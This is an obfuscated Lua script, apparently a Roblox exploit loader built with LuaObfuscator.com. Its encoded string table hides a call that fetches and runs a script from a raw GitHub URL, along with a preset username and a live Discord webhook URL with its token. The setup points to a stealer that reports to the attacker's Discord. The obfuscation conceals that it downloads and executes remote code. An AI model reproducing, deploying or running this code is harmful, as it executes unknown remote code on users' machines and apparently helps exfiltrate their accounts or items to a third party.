--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=v2(v0(v30,16));if v19 then local v111=0;local v112;while true do if (v111==1) then return v112;end if (v111==0) then v112=v5(v87,v19);v19=nil;v111=1;end end else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-(1 + 0))))%((1 + (4 -3))^(((v33-(878 -(282 + 595))) -(v32-1)) + (2 -1))) ;return v88-(v88%(1 -0)) ;else local v89=(4 -2)^(v32-(620 -((672 -(32 + 85)) + 64))) ;return (((v31%(v89 + v89))>=v89) and (932 -(840 + 17 + 74))) or (568 -(367 + 45 + 156)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=957 -(892 + 65) ;local v36;local v37;while true do if (v35==1) then return (v37 * 256) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + ((183 -(67 + 113)) -1) ;v35=351 -(64 + 23 + 263) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;return (v41 * (66680831 -49903615)) + (v40 * ((120606 -54118) -(802 + 150))) + (v39 * (689 -433)) + v38 ;end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1000 -((3809 -2894) + 82))) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else v47=1188 -(1069 + 118) ;v45=0 -0 ;end elseif (v47==(4477 -2430)) then return ((v46==0) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1015 + 8) ) * (v45 + (v46/((793 -(368 + 423))^(163 -111)))) ;end if (v42==(19 -(10 + 8))) then v45=3 -2 ;v46=(v20(v44,443 -(416 + 26) ,63 -43 ) * (2^(14 + 18))) + v43 ;v42=3 -1 ;end if (((258 + 180) -(145 + 293))==v42) then v43=v23();v44=v23();v42=431 -(44 + 386) ;end if ((1488 -((3643 -2645) + 488))==v42) then v47=v20(v44,21,(35 -25) + 21 );v48=((v20(v44,32)==(1 + 0)) and  -(773 -(201 + (1430 -(814 + 45))))) or (1139 -(116 + 1022)) ;v42=3;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=1 + 0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0 + 0 ;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v90~= #"\\") then else if (v91== #"\\") then v92=(function() return v93()~=(698 -(208 + 490)) ;end)();elseif (v91==(7 -5)) then v92=(function() return v94();end)();elseif (v91== #"asd") then v92=(function() return v95();end)();end v96[v97]=(function() return v92;end)();break;end if (v90~=(1824 -(1195 + 629))) then else local v118=(function() return 0 + 0 ;end)();while true do if (v118==(0 + 0)) then v91=(function() return v93();end)();v92=(function() return nil;end)();v118=(function() return 837 -(660 + 176) ;end)();end if ((1 + 0)==v118) then v90=(function() return  #",";end)();break;end end end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v53=(function() return function(v98,v99,v100) local v101=(function() return 0 + 0 ;end)();local v102=(function() return;end)();while true do if (v101~=(0 + 0)) then else v102=(function() return 202 -(14 + 188) ;end)();while true do if (v102==(675 -(534 + 141))) then v98[v99-#"~" ]=(function() return v100();end)();return v98,v99,v100;end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"~",v58 do FlatIdent_1BCFB,Type,Cons,v21,v24,v25,v59,v69=(function() return v52(FlatIdent_1BCFB,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"asd"]=(function() return v21();end)();for v70= #">",v23() do local v71=(function() return v21();end)();if (v20(v71, #"|", #"~")==(0 + 0)) then local v106=(function() return 0 + 0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if ((0 -0)==v106) then local v119=(function() return 0;end)();while true do if (v119~=(1637 -(1373 + 263))) then else v106=(function() return 1 -0 ;end)();break;end if (0==v119) then local v122=(function() return 0;end)();while true do if (v122==(0 -0)) then v107=(function() return 0 + 0 ;end)();v108=(function() return nil;end)();v122=(function() return 1001 -(451 + 549) ;end)();end if (1==v122) then v119=(function() return 1;end)();break;end end end end end if (v106~=2) then else while true do if (v107== #"[") then local v123=(function() return 0;end)();local v124=(function() return;end)();while true do if (v123~=(0 + 0)) then else v124=(function() return 0;end)();while true do if (v124==(1 + 0)) then v107=(function() return 398 -(115 + 281) ;end)();break;end if (v124~=(0 -0)) then else v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==0) then local v176=(function() return 0;end)();while true do if (v176==0) then v110[ #"xxx"]=(function() return v22();end)();v110[ #"xnxx"]=(function() return v22();end)();break;end end elseif (v108== #"}") then v110[ #"19("]=(function() return v23();end)();elseif (v108==2) then v110[ #"19("]=(function() return v23() -((1386 -(746 + 638))^(7 + 9)) ;end)();elseif (v108~= #"-19") then else local v183=(function() return 0 + 0 ;end)();local v184=(function() return;end)();while true do if (v183~=(0 -0)) then else v184=(function() return 341 -(218 + 123) ;end)();while true do if (v184~=0) then else v110[ #"xxx"]=(function() return v23() -((4 -2)^(58 -42)) ;end)();v110[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v124=(function() return 1582 -(1535 + 46) ;end)();end end break;end end end if ((0 + 0)~=v107) then else local v125=(function() return 867 -(550 + 317) ;end)();local v126=(function() return;end)();while true do if (v125==(0 + 0)) then v126=(function() return 0 -0 ;end)();while true do if (v126~=(560 -(306 + 254))) then else v108=(function() return v20(v71,2 -0 , #"19(");end)();v109=(function() return v20(v71, #"0836",6);end)();v126=(function() return 2 -1 ;end)();end if (v126==(286 -(134 + 151))) then v107=(function() return  #",";end)();break;end end break;end end end if (v107==(1667 -(970 + 695))) then local v127=(function() return 0;end)();local v128=(function() return;end)();while true do if ((0 + 0)~=v127) then else v128=(function() return 0 -0 ;end)();while true do if (v128~=(0 -0)) then else if (v20(v109, #">", #"/")~= #"}") then else v110[605 -(268 + 335) ]=(function() return v59[v110[292 -(60 + 230) ]];end)();end if (v20(v109,2,574 -(426 + 146) )~= #",") then else v110[ #"gha"]=(function() return v59[v110[ #"-19"]];end)();end v128=(function() return 1;end)();end if (v128~=1) then else v107=(function() return  #"-19";end)();break;end end break;end end end if (v107~= #"gha") then else if (v20(v109, #"xxx", #"-19")~= #",") then else v110[ #"asd1"]=(function() return v59[v110[ #"0313"]];end)();end v54[v70]=(function() return v110;end)();break;end end break;end if (v106~=(1991 -(582 + 1408))) then else local v120=(function() return 0 + 0 ;end)();while true do if (v120~=0) then else v109=(function() return nil;end)();v110=(function() return nil;end)();v120=(function() return 1457 -(282 + 1174) ;end)();end if (v120==(3 -2)) then v106=(function() return 2 -0 ;end)();break;end end end end end end for v72= #"]",v23() do v55,v72,v28=(function() return v53(v55,v72,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[2 + 0 ];local v66=v61[8 -5 ];return function(...) local v73=v64;local v74=v65;local v75=v66;local v76=v27;local v77=1 + 0 ;local v78= -(1025 -(706 + (1174 -(564 + 292))));local v79={};local v80={...};local v81=v12("#",...) -(1252 -(721 + 530)) ;local v82={};local v83={};for v103=1271 -(945 + 326) ,v81 do if ((v103>=v75) or (164>=2785)) then v79[v103-v75 ]=v80[v103 + ((2 -0) -1) ];else v83[v103]=v80[v103 + 1 + 0 ];end end local v84=(v81-v75) + (701 -((816 -545) + 429)) ;local v85;local v86;while true do v85=v73[v77];v86=v85[1 + 0 ];if (v86<=(1509 -(1408 + 92))) then if ((v86<=(1090 -(461 + 625))) or (525==2109)) then if (v86<=(1289 -((1297 -(244 + 60)) + 295))) then if ((33==33) and (v86==(0 + 0))) then local v130=v85[1 + 1 ];local v131=v83[v85[1174 -(418 + 753) ]];v83[v130 + 1 + 0 ]=v131;v83[v130]=v131[v85[4]];else do return;end end elseif (v86<=(1 + (477 -(41 + 435)))) then v83[v85[2]]();elseif (v86==(1 + 2)) then v83[v85[379 -(142 + 235) ]]();else local v160=v85[9 -7 ];v83[v160]=v83[v160](v13(v83,v160 + 1 + 0 ,v78));end elseif (v86<=(535 -((1407 -(938 + 63)) + 123))) then if (v86==(1774 -(1749 + 20))) then if ((3054<=4015) and (v83[v85[1 + 1 ]]==v85[4 + 0 ])) then v77=v77 + ((1018 + 305) -(1249 + 73)) ;else v77=v85[2 + 1 ];end else v63[v85[(1127 -(936 + 189)) + 1 ]]=v83[v85[1147 -(466 + 679) ]];end elseif (v86<=(4 + 3)) then v77=v85[(2 + 4) -3 ];elseif (v86>(22 -14)) then local v163=v85[1902 -(106 + 1794) ];local v164=v83[v85[1 + (1615 -(1565 + 48)) ]];v83[v163 + (4 -3) ]=v164;v83[v163]=v164[v85[757 -(239 + 514) ]];elseif (v83[v85[1 + 1 ]]==v85[(7 + 4) -(1145 -(782 + 356)) ]) then v77=v77 + (1330 -(797 + 532)) ;else v77=v85[7 -4 ];end elseif ((1871<3382) and (v86<=(128 -(4 + 110)))) then if ((1293<=2166) and (v86<=(595 -(57 + 527)))) then if (v86>(1437 -(41 + 1386))) then v83[v85[733 -(476 + 255) ]]=v63[v85[106 -((284 -(176 + 91)) + 86) ]];else local v140=v85[2 + 0 ];local v141,v142=v76(v83[v140](v13(v83,v140 + (1 -0) ,v85[3])));v78=(v142 + v140) -(1 -0) ;local v143=238 -((166 -102) + (255 -81)) ;for v155=v140,v78 do local v156=0 + (1092 -(975 + 117)) ;while true do if ((v156==(0 -0)) or (2579<123)) then v143=v143 + (167 -(122 + 44)) ;v83[v155]=v141[v143];break;end end end end elseif (v86<=(20 -8)) then v83[v85[6 -4 ]]=v85[3 + 0 ];elseif (v86==(2 + 11)) then v83[v85[2 + 0 ]]=v63[v85[(1880 -(157 + 1718)) -2 ]];else do return;end end elseif (v86<=(81 -(25 + 5 + 35))) then if ((v86==(11 + 4)) or (846>=2368)) then v83[v85[1259 -(1043 + 214) ]]=v85[3 + 0 ];else local v148=v85[2];local v149,v150=v76(v83[v148](v13(v83,v148 + (3 -2) ,v85[1215 -((1146 -823) + 889) ])));v78=(v150 + v148) -(2 -1) ;local v151=0 -0 ;for v157=v148,v78 do v151=v151 + (581 -(361 + 219)) ;v83[v157]=v149[v151];end end elseif (v86<=(337 -(53 + 267))) then v63[v85[11 -8 ]]=v83[v85[2]];elseif (v86==(5 + 13)) then local v170=v85[2];v83[v170]=v83[v170](v13(v83,v170 + (414 -(15 + 398)) ,v78));else v77=v85[985 -(18 + 964) ];end v77=v77 + (3 -2) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6977616E74736F6D332F7363726970742F726566732F68656164732F6D61696E2F5465737403083Q00557365724E616D6503113Q00496C496C496C3Q495Q6C2Q493103073Q00576562482Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F3132393530352Q3830373136383433383239342F56436F733870425535526E63596A376F43485148416B354164484943732Q4F5A575F52726C585177375047516B3241514731355F372D2Q4F706E546C337543355A66454C00143Q00120C3Q00013Q0026083Q000B000100020004133Q000B000100120B000100033Q00120B000200043Q00202Q00020002000500120C000400064Q000A000200044Q000400013Q00022Q00030001000100010004133Q001300010026083Q0001000100010004133Q0001000100120C000100083Q001206000100073Q00120C0001000A3Q001206000100093Q00120C3Q00023Q0004133Q000100012Q00013Q00017Q00",v9(),...);
